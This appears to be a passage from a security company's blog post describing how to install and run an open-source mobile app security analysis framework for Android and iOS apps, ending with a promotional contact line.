Dynamic analysis is slightly more difficult to configure; it runs mainly on a VM or on configured devices and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTP traffic, dumps, logs, etc.
This tool is highly scalable: you can add your own custom rules easily, you can use the framework’s results as a source for detecting mobile application issues manually, and finally the overall report is saved in the folder you selected.

STATIC ANALYSIS APK RESULTS:

CERTIFICATE ISSUE:

STATIC ANALYSIS IN IOS RESULT:

CONFIGURING STATIC ANALYZER:

Tested on Windows 7, 8, 8.1, Ubuntu, OS X Mavericks.
Install Django version 1.8:
pip install Django==1.8
Here I have installed Django on Linux.
Django is a web application framework that makes the process easier because it has some automated tools built in, so it produces the result in a short time.
YSO Framework Configuration in Linux:
I have configured the YSO Framework and configured the server.
Configuration link: http://127.0.0.1:8000/
Once you have entered this URL in your browser you’ll get a page as follows:

YSO EXECUTION ON BROWSER:

In this framework you can upload the particular APK or IPA file that you are going to test, and it produces the result as in the above figure.

CONCLUSION:

In this blog we have discussed the installation, configuration and working method of the YSO mobile application framework, and we also discussed the results produced for a particular APK or IPA file.
YSO Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We’ve been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-testing, and this process requires a lot of effort and time. YSO Mobile Security Framework can be used for effective and fast security analysis of Android and iOS applications.
BriskInfosec provides the best mobile security solutions. For further doubts and security solution advice reach us @ Contact@briskinfosec.com

AUTHOR

RamKumar
Security Engineer
BriskInfosec Technology and Consulting PVT LTD
Follow me @ https://www.linkedin.com/in/ram-kumar-3439b511a/